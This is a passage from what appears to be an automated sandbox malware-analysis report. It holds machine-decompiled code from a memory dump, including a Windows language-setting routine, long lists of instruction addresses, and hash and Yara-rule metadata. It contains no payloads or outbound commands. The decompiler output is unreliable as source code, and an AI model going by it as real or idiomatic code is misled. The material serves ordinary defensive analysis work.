									__eflags = _t259 - 0xc0000100;
									if(_t259 == 0xc0000100) {
										_v32 = E011A2C50(_v36, _a8, _t281, _a16, _a20, _t326, 1);
									}
									_v8 = _t318;
									E011A2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t245 = _t326;
					}
					L70:
					return E011CD0D1(_t245);
				}
				L108:
			}




















































                                                                          0x011a2584
                                                                          0x011a2586
                                                                          0x011a2590
                                                                          0x011a2596
                                                                          0x011a2597
                                                                          0x011a2598
                                                                          0x011a2599
                                                                          0x011a259e
                                                                          0x011a25a4
                                                                          0x011a25a9
                                                                          0x011a25ac
                                                                          0x011a25ae
                                                                          0x011a25b1
                                                                          0x011a25b2
                                                                          0x011a25b5
                                                                          0x011a25b8
                                                                          0x011a25bb
                                                                          0x011a25bc
                                                                          0x011a25bf
                                                                          0x011a25c2
                                                                          0x011a25c5
                                                                          0x011a25c6
                                                                          0x011a25cb
                                                                          0x011a25ce
                                                                          0x011a25d8
                                                                          0x011a25dd
                                                                          0x011a25de
                                                                          0x011a25e1
                                                                          0x011a25e3
                                                                          0x011a25e9
                                                                          0x011a26da
                                                                          0x011a26da
                                                                          0x011a26dd
                                                                          0x011a26e2
                                                                          0x011e5b56
                                                                          0x00000000
                                                                          0x011a26e8
                                                                          0x011a26f9
                                                                          0x011a26fb
                                                                          0x011a26fe
                                                                          0x011a2700
                                                                          0x011e5b60
                                                                          0x00000000
                                                                          0x011a2706
                                                                          0x011a2706
                                                                          0x011a270a
                                                                          0x011a270a
                                                                          0x011a270d
                                                                          0x011a2713
                                                                          0x011a2716
                                                                          0x011a2718
                                                                          0x011a271c
                                                                          0x011a271e
                                                                          0x011e5b6c
                                                                          0x011e5b6f
                                                                          0x011e5b7f
                                                                          0x011e5b89
                                                                          0x011e5b8e
                                                                          0x011e5b93
                                                                          0x011e5b96
                                                                          0x011e5b9c
                                                                          0x011e5ba0
                                                                          0x011e5ba3
                                                                          0x011e5bab
                                                                          0x011e5bb0
                                                                          0x011e5bb3
                                                                          0x011e5bb3
                                                                          0x011e5ba3
                                                                          0x011a2724
                                                                          0x011a2726
                                                                          0x011a2729
                                                                          0x011a272c
                                                                          0x011a279d
                                                                          0x011a279d
                                                                          0x011a27a0
                                                                          0x011a27a2
                                                                          0x00000000
                                                                          0x011a272e
                                                                          0x011a272e
                                                                          0x011a2731
                                                                          0x011a2734
                                                                          0x011a2734
                                                                          0x011a2736
                                                                          0x011e5bc1
                                                                          0x011e5bc1
                                                                          0x011e5bc4
                                                                          0x00000000
                                                                          0x011e5bca
                                                                          0x011e5bca
                                                                          0x011e5bcd
                                                                          0x00000000
                                                                          0x011e5bd3
                                                                          0x00000000
                                                                          0x011e5bd3
                                                                          0x011e5bcd
                                                                          0x011a273c
                                                                          0x011a273c
                                                                          0x011a2742
                                                                          0x011a2747
                                                                          0x011a274a
                                                                          0x011a274d
                                                                          0x011a2750
                                                                          0x00000000
                                                                          0x011a2756
                                                                          0x011a2756
                                                                          0x00000000
                                                                          0x011a2902
                                                                          0x011a2908
                                                                          0x011a290b
                                                                          0x00000000
                                                                          0x011a2911
                                                                          0x011a291c
                                                                          0x011a2921
                                                                          0x00000000
                                                                          0x011a2921
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011a2880
                                                                          0x011a2887
                                                                          0x011a288c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011a2805
                                                                          0x011a280a
                                                                          0x011a2814
                                                                          0x011a2816
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011a281e
                                                                          0x011a2821
                                                                          0x011a2823
                                                                          0x00000000
                                                                          0x011a2829
                                                                          0x011a2829
                                                                          0x011a2831
                                                                          0x011a283c
                                                                          0x011a283e
                                                                          0x00000000
                                                                          0x011a283e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011a284e
                                                                          0x011a2850
                                                                          0x011a2851
                                                                          0x011a2854
                                                                          0x011a2857
                                                                          0x011a285a
                                                                          0x011a285c
                                                                          0x011a285d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011a275d
                                                                          0x011a2761
                                                                          0x00000000
                                                                          0x011a2767
                                                                          0x011a276e
                                                                          0x011a2773
                                                                          0x011a2773
                                                                          0x011a2776
                                                                          0x011a2778
                                                                          0x011a277e
                                                                          0x011a277e
                                                                          0x011a2781
                                                                          0x011a2781
                                                                          0x011a2783
                                                                          0x011a2784
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e5bd8
                                                                          0x011e5bde
                                                                          0x011e5be4
                                                                          0x011e5be6
                                                                          0x011e5be8
                                                                          0x011e5be9
                                                                          0x011e5bee
                                                                          0x011e5bf8
                                                                          0x011e5bff
                                                                          0x011e5c01
                                                                          0x011e5c04
                                                                          0x011e5c07
                                                                          0x011e5c0b
                                                                          0x011e5c0d
                                                                          0x011e5c0d
                                                                          0x011e5c15
                                                                          0x011e5c18
                                                                          0x011e5c1b
                                                                          0x011e5c1b
                                                                          0x011e5c1e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011a28c3
                                                                          0x011a28c8
                                                                          0x011a28d2
                                                                          0x011a28d4
                                                                          0x011a28d8
                                                                          0x011a28db
                                                                          0x011e5c26
                                                                          0x011e5c28
                                                                          0x011e5c2d
                                                                          0x011e5c2d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e5c34
                                                                          0x011e5c36
                                                                          0x011e5c49
                                                                          0x011e5c4e
                                                                          0x011e5c54
                                                                          0x011e5c5b
                                                                          0x011e5c5d
                                                                          0x011e5c60
                                                                          0x011a2788
                                                                          0x011a2788
                                                                          0x011a278b
                                                                          0x011a278e
                                                                          0x011a278e
                                                                          0x011a278e
                                                                          0x011a2791
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011a2756
                                                                          0x011a2750
                                                                          0x00000000
                                                                          0x011a2794
                                                                          0x011a2794
                                                                          0x011a2795
                                                                          0x011a2798
                                                                          0x011a2798
                                                                          0x00000000
                                                                          0x011a2734
                                                                          0x011a272c
                                                                          0x011a2700
                                                                          0x011a25ef
                                                                          0x011a25ef
                                                                          0x011a25ef
                                                                          0x011a25f2
                                                                          0x011a25f8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011a25fe
                                                                          0x00000000
                                                                          0x011a28e6
                                                                          0x011a28ec
                                                                          0x011a28ef
                                                                          0x011a28f5
                                                                          0x011a28f8
                                                                          0x011a28f8
                                                                          0x00000000
                                                                          0x011a28f8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011a2866
                                                                          0x011a2866
                                                                          0x011a2876
                                                                          0x011a2879
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011a27e0
                                                                          0x011a27e7
                                                                          0x011a27e9
                                                                          0x011a27eb
                                                                          0x011e5afd
                                                                          0x00000000
                                                                          0x011e5afd
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011a2633
                                                                          0x011a2638
                                                                          0x011a263b
                                                                          0x011a263c
                                                                          0x011a263e
                                                                          0x011a2640
                                                                          0x011a2642
                                                                          0x011a2647
                                                                          0x011a2649
                                                                          0x011a264e
                                                                          0x011a2650
                                                                          0x011a2653
                                                                          0x011a2659
                                                                          0x011a26a2
                                                                          0x011a26a7
                                                                          0x011a26ac
                                                                          0x011a26b2
                                                                          0x011e5b11
                                                                          0x011e5b15
                                                                          0x011e5b17
                                                                          0x00000000
                                                                          0x011a26b8
                                                                          0x011a26b8
                                                                          0x011a26ba
                                                                          0x011a27a6
                                                                          0x011a27a6
                                                                          0x011a27a9
                                                                          0x011a27ab
                                                                          0x011a27b9
                                                                          0x011a27b9
                                                                          0x011a27be
                                                                          0x011a27c1
                                                                          0x011a27c3
                                                                          0x011a27c5
                                                                          0x011a27c7
                                                                          0x011e5c74
                                                                          0x011e5c79
                                                                          0x011e5c79
                                                                          0x011a27c7
                                                                          0x00000000
                                                                          0x011a26c0
                                                                          0x011a26c0
                                                                          0x011a26c3
                                                                          0x011a26c6
                                                                          0x011a26c6
                                                                          0x011a26c9
                                                                          0x011a26c9
                                                                          0x00000000
                                                                          0x011a26c9
                                                                          0x011a26ba
                                                                          0x011a265b
                                                                          0x011a265b
                                                                          0x011a265e
                                                                          0x011a2667
                                                                          0x011a266d
                                                                          0x011a2677
                                                                          0x011a267c
                                                                          0x011a267f
                                                                          0x011a2681
                                                                          0x011e5b49
                                                                          0x011e5b4e
                                                                          0x011a27cd
                                                                          0x011a27d0
                                                                          0x011a27d1
                                                                          0x011a27d2
                                                                          0x011a27d4
                                                                          0x011a27dd
                                                                          0x011a2687
                                                                          0x011a2687
                                                                          0x011a268a
                                                                          0x011a268b
                                                                          0x011a268e
                                                                          0x011a268f
                                                                          0x011a2691
                                                                          0x011a2696
                                                                          0x011a2698
                                                                          0x011a269d
                                                                          0x011a269f
                                                                          0x00000000
                                                                          0x011a269f
                                                                          0x011a2681
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011a2846
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011a2605
                                                                          0x011a260a
                                                                          0x011a260c
                                                                          0x011a2611
                                                                          0x011a2616
                                                                          0x011a2619
                                                                          0x011a2619
                                                                          0x011a261e
                                                                          0x00000000
                                                                          0x011a2624
                                                                          0x011a2627
                                                                          0x011a2627
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e5b1f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011a2894
                                                                          0x011a289b
                                                                          0x011a289d
                                                                          0x011a28a1
                                                                          0x011e5b2b
                                                                          0x011e5b2e
                                                                          0x011e5b2e
                                                                          0x011a28a7
                                                                          0x011a28a9
                                                                          0x011e5b04
                                                                          0x011e5b09
                                                                          0x011e5b09
                                                                          0x011e5b09
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e5b35
                                                                          0x011e5b3c
                                                                          0x011a28fb
                                                                          0x011a28fb
                                                                          0x011a26cc
                                                                          0x011a26cc
                                                                          0x011a26d0
                                                                          0x00000000
                                                                          0x011a26d2
                                                                          0x011a26d2
                                                                          0x00000000
                                                                          0x011a26d2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011a25fe
                                                                          0x011a292d
                                                                          0x011a292f
                                                                          0x011a2930
                                                                          0x011a2935
                                                                          0x011a2937
                                                                          0x011a2939
                                                                          0x011a293c
                                                                          0x011a293e
                                                                          0x011a293f
                                                                          0x011a2941
                                                                          0x011a2945
                                                                          0x011a2946
                                                                          0x011a2948
                                                                          0x011a294e
                                                                          0x011a294f
                                                                          0x011a2950
                                                                          0x011a2957
                                                                          0x011a2958
                                                                          0x011a295a
                                                                          0x011a295c
                                                                          0x011a2962
                                                                          0x011a2963
                                                                          0x011a2965
                                                                          0x011a2966
                                                                          0x011a2968
                                                                          0x011a296b
                                                                          0x011a296e
                                                                          0x011a296f
                                                                          0x011a2971
                                                                          0x011a2974
                                                                          0x011a297b
                                                                          0x011a297c
                                                                          0x011a297e
                                                                          0x011a297f
                                                                          0x011a2980
                                                                          0x011a2981
                                                                          0x011a2982
                                                                          0x011a2983
                                                                          0x011a2984
                                                                          0x011a2985
                                                                          0x011a2986
                                                                          0x011a2987
                                                                          0x011a2988
                                                                          0x011a2989
                                                                          0x011a298a
                                                                          0x011a298b
                                                                          0x011a298c
                                                                          0x011a298d
                                                                          0x011a298e
                                                                          0x011a298f
                                                                          0x011a2990
                                                                          0x011a2992
                                                                          0x011a2997
                                                                          0x011a29a3
                                                                          0x011a29a6
                                                                          0x011a29ab
                                                                          0x011a29ad
                                                                          0x011a29b0
                                                                          0x011a29b2
                                                                          0x011e5c80
                                                                          0x011a29b8
                                                                          0x011a29b8
                                                                          0x011a29bb
                                                                          0x011a29c0
                                                                          0x011a29c5
                                                                          0x011a29c6
                                                                          0x011a29c6
                                                                          0x011a29c9
                                                                          0x011a29cb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011a29cd
                                                                          0x011a29d0
                                                                          0x011a29d9
                                                                          0x011a29db
                                                                          0x011a29dd
                                                                          0x011a2a7f
                                                                          0x011a2a84
                                                                          0x011a2a87
                                                                          0x011a2a89
                                                                          0x011e5ca1
                                                                          0x011e5ca3
                                                                          0x00000000
                                                                          0x011a2a8f
                                                                          0x011a2a8f
                                                                          0x00000000
                                                                          0x011a2a8f
                                                                          0x00000000
                                                                          0x011a29e3
                                                                          0x011a29e3
                                                                          0x011a29e3
                                                                          0x00000000
                                                                          0x011a29e3
                                                                          0x011a29dd
                                                                          0x00000000
                                                                          0x011a29db
                                                                          0x011a29e6
                                                                          0x011a29e9
                                                                          0x011a29eb
                                                                          0x011a29ed
                                                                          0x011a29f3
                                                                          0x011a29f5
                                                                          0x011a29f8
                                                                          0x011a29fa
                                                                          0x011a2a97
                                                                          0x011a2a9a
                                                                          0x011a2a9d
                                                                          0x011a2add
                                                                          0x00000000
                                                                          0x011a2a9f
                                                                          0x011a2aa2
                                                                          0x011a2aa5
                                                                          0x011a2aa8
                                                                          0x011a2aab
                                                                          0x011e5cab
                                                                          0x011e5caf
                                                                          0x011e5cc5
                                                                          0x011e5cda
                                                                          0x011e5cdc
                                                                          0x011e5cdf
                                                                          0x011e5ce5
                                                                          0x00000000
                                                                          0x011e5ceb
                                                                          0x011e5ced
                                                                          0x011e5cee
                                                                          0x00000000
                                                                          0x011e5cee
                                                                          0x011e5cb1
                                                                          0x011e5cb4
                                                                          0x011e5cb9
                                                                          0x011e5cbb
                                                                          0x00000000
                                                                          0x011e5cbd
                                                                          0x011e5cbd
                                                                          0x00000000
                                                                          0x011e5cbd
                                                                          0x011e5cbb
                                                                          0x011a2ab1
                                                                          0x011a2ab1
                                                                          0x011a2ac4
                                                                          0x011a2ac6
                                                                          0x011a2ac6
                                                                          0x00000000
                                                                          0x011a2ac6
                                                                          0x011a2aab
                                                                          0x00000000
                                                                          0x011a2a00
                                                                          0x011a2a09
                                                                          0x011a2a0e
                                                                          0x011a2a21
                                                                          0x011a2a24
                                                                          0x011a2a35
                                                                          0x011a2a3a
                                                                          0x011a2a3d
                                                                          0x011a2a42
                                                                          0x011a2a59
                                                                          0x011a2a59
                                                                          0x011a2a5c
                                                                          0x011a2a5f
                                                                          0x011a2a5f
                                                                          0x011a29fa
                                                                          0x011a29f3
                                                                          0x011a2a64
                                                                          0x011a2a64
                                                                          0x011a2a6b
                                                                          0x011a2a6b
                                                                          0x011a2a6d
                                                                          0x011a2a72
                                                                          0x011a2a72
                                                                          0x00000000

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: PATH
                                                                          • API String ID: 0-1036084923
                                                                          • Opcode ID: 26e1823a63ffd7e9844e5c73758b5f8804bfc23bc96c8c51a6a7ee958bfba5bd
                                                                          • Instruction ID: b49b15d27abf9d8b74ca7aa63f934749d876c36752be6877f574ce6875e0b23b
                                                                          • Opcode Fuzzy Hash: 26e1823a63ffd7e9844e5c73758b5f8804bfc23bc96c8c51a6a7ee958bfba5bd
                                                                          • Instruction Fuzzy Hash: 5CC1A0B9E01619DBDB2DDF98D880BBDBFB5FF58704F854029E901AB290D734A941CB60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011AFAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 80%
                                                                          			E011AFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0118EEF0(0x1267b60);
					_t134 =  *0x1267b84; // 0x773b7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1267b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1267b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E01186D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E011876E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01218938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0117B150();
													}
													_t116 = E01216D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E011875CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1268638; // 0x0
																	_t122 = L011838A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E011876E2(_t154);
																			goto L41;
																		}
																	} else {
																		E011876E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L011AFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L011870F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E011AFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E011AFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E011AFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E011AFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E011AFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1267b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1267b84 = _t75;
						_t73 = E0118EB70(_t134, 0x1267b60);
						if( *0x1267b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0118FF60( *0x1267b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                          0x011afab0
                                                                          0x011afab2
                                                                          0x011afab3
                                                                          0x011afab4
                                                                          0x011afabc
                                                                          0x011afac0
                                                                          0x011afb14
                                                                          0x011afb17
                                                                          0x011afac2
                                                                          0x011afac8
                                                                          0x011afacd
                                                                          0x011afad3
                                                                          0x011afad3
                                                                          0x011afadd
                                                                          0x011afb18
                                                                          0x011afb1b
                                                                          0x011afb1d
                                                                          0x011afb1e
                                                                          0x011afb1f
                                                                          0x011afb20
                                                                          0x011afb21
                                                                          0x011afb22
                                                                          0x011afb23
                                                                          0x011afb24
                                                                          0x011afb25
                                                                          0x011afb26
                                                                          0x011afb27
                                                                          0x011afb28
                                                                          0x011afb29
                                                                          0x011afb2a
                                                                          0x011afb2b
                                                                          0x011afb2c
                                                                          0x011afb2d
                                                                          0x011afb2e
                                                                          0x011afb2f
                                                                          0x011afb3a
                                                                          0x011afb3b
                                                                          0x011afb3e
                                                                          0x011afb41
                                                                          0x011afb44
                                                                          0x011afb47
                                                                          0x011afb4a
                                                                          0x011afb4d
                                                                          0x011afb53
                                                                          0x011ebdcb
                                                                          0x011ebdcb
                                                                          0x011afb59
                                                                          0x011afb5b
                                                                          0x011afb5b
                                                                          0x011afb5e
                                                                          0x011ebdd5
                                                                          0x011ebdd8
                                                                          0x00000000
                                                                          0x011ebdda
                                                                          0x00000000
                                                                          0x011ebdda
                                                                          0x011afb64
                                                                          0x011afb64
                                                                          0x011afb64
                                                                          0x011afb67
                                                                          0x011afb6e
                                                                          0x011afb70
                                                                          0x011afb72
                                                                          0x00000000
                                                                          0x011afb78
                                                                          0x011afb7a
                                                                          0x011afb7a
                                                                          0x011afb7d
                                                                          0x011afb80
                                                                          0x011ebddf
                                                                          0x011ebde1
                                                                          0x00000000
                                                                          0x011ebde3
                                                                          0x00000000
                                                                          0x011ebde3
                                                                          0x011afb86
                                                                          0x011afb86
                                                                          0x011afb86
                                                                          0x011afb8b
                                                                          0x011afb90
                                                                          0x011afb92
                                                                          0x011afb94
                                                                          0x011afb9a
                                                                          0x011afb9b
                                                                          0x011afba1
                                                                          0x011ebde8
                                                                          0x011ebdeb
                                                                          0x011ebded
                                                                          0x011ebeb5
                                                                          0x011ebeb5
                                                                          0x011ebebb
                                                                          0x011ebebd
                                                                          0x011ebec3
                                                                          0x011ebed2
                                                                          0x011ebedd
                                                                          0x011ebedd
                                                                          0x011ebeed
                                                                          0x00000000
                                                                          0x011ebdf3
                                                                          0x011ebdfe
                                                                          0x011ebe06
                                                                          0x011ebe0b
                                                                          0x011ebe0d
                                                                          0x011ebe0f
                                                                          0x011ebe14
                                                                          0x011ebe19
                                                                          0x011ebe20
                                                                          0x011ebe25
                                                                          0x011ebe27
                                                                          0x011ebe35
                                                                          0x011ebe39
                                                                          0x011ebe46
                                                                          0x011ebe4f
                                                                          0x011ebe54
                                                                          0x011ebe56
                                                                          0x011ebef8
                                                                          0x011ebef8
                                                                          0x00000000
                                                                          0x011ebe5c
                                                                          0x011ebe5c
                                                                          0x011ebe60
                                                                          0x00000000
                                                                          0x011ebe66
                                                                          0x011ebe66
                                                                          0x011ebe7f
                                                                          0x011ebe84
                                                                          0x011ebe87
                                                                          0x011ebe89
                                                                          0x011ebe8b
                                                                          0x011ebe99
                                                                          0x011ebe9d
                                                                          0x011ebea0
                                                                          0x011ebeac
                                                                          0x011ebeaf
                                                                          0x011ebeb1
                                                                          0x011ebeb3
                                                                          0x011ebeb3
                                                                          0x00000000
                                                                          0x011ebea2
                                                                          0x011ebea2
                                                                          0x00000000
                                                                          0x011ebea2
                                                                          0x011ebe8d
                                                                          0x011ebe8d
                                                                          0x011ebe92
                                                                          0x00000000
                                                                          0x011ebe92
                                                                          0x011ebe8b
                                                                          0x011ebe60
                                                                          0x011ebe3b
                                                                          0x011ebe3b
                                                                          0x011ebe3e
                                                                          0x00000000
                                                                          0x011ebe40
                                                                          0x011ebe40
                                                                          0x011ebe44
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011ebe44
                                                                          0x011ebe3e
                                                                          0x011ebe29
                                                                          0x011ebe29
                                                                          0x00000000
                                                                          0x011ebe29
                                                                          0x011ebe27
                                                                          0x00000000
                                                                          0x011afba7
                                                                          0x011afba7
                                                                          0x011afbab
                                                                          0x011ebf02
                                                                          0x011afbb1
                                                                          0x011afbb1
                                                                          0x011afbb8
                                                                          0x011afbbd
                                                                          0x011afbbd
                                                                          0x011afbbf
                                                                          0x011afbbf
                                                                          0x011afbc5
                                                                          0x011afbcb
                                                                          0x011afbf8
                                                                          0x011afbf8
                                                                          0x011afbfa
                                                                          0x00000000
                                                                          0x011afc00
                                                                          0x011afc00
                                                                          0x011afc03
                                                                          0x00000000
                                                                          0x011afc09
                                                                          0x011afc09
                                                                          0x011afc0f
                                                                          0x011afc15
                                                                          0x011afc23
                                                                          0x011afc23
                                                                          0x011afc25
                                                                          0x011afc27
                                                                          0x011afc75
                                                                          0x011afc7c
                                                                          0x011afc84
                                                                          0x00000000
                                                                          0x011afc29
                                                                          0x011afc29
                                                                          0x011afc2d
                                                                          0x011afc30
